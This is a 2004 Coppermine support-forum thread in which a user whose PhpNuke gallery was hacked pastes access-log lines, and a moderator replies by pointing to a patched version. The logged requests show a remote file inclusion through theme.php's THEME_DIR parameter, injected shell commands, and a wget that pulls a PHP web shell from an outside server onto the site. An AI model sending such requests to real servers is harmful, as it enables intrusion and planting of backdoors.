coppermine-gallery.com/forum

Support => Older/other versions => cpg1.2 Standalone Support => Topic started by: Doozer on August 25, 2004, 12:07:30 AM

Title: [n/a (wrong board, wrong software)]: Hacked in PhpNuke
Post by: Doozer on August 25, 2004, 12:07:30 AM
Sorry for this post, but i was hacked with Coppermine 1.2.1 for PhpNuke:

Installed an Irc-Bot!

This is the ACCESS.log for this time:

"GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.XX.XX/x.txt?&cmd=wget HTTP/1.0" 200 3065
"GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.XX.XX/x.txt?&cmd=/sbin/ifconfig HTTP/1.0" 200 7490
"GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.XX.XX/x.txt?&cmd=cd%20..;cd%20..;cd%20..;ls%20-FRla|grep%20drwxrwxrw HTTP/1.0" 200 6000
"GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.XX.XX/x.txt?&cmd=cd%20..;cd%20..;cd%20..;find%20.%20-name%20gallery%20-print HTTP/1.0" 200 2785
"GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.XX.XX/x.txt?&cmd=cd%20..;cd%20..;cd%20..;cd%20Forums/images/avatars/gallery;wget%20IRC-SERVER/nama/tcl/phpshell.txt%20-O%20data.php HTTP/1.0" 200 4605
"GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.XX.XX/x.txt?&cmd=cd%20..;cd%20..;cd%20..;cd%20Forums/images/avatars/gallery;pwd HTTP/1.0" 200 3010


Is it solved, or still there?
Sorry for my English, but i am German ;)

For more Information, please Contact me!

Greetz Doozer
Title: Re: Hacked in PhpNuke
Post by: Casper on August 25, 2004, 12:20:08 AM
There was a problem with the coppermine for nuke, not the standalone version.  There is a newer version, and a patch for that version, afaik.

Please go to www.nukephotogallery.com for support for that version.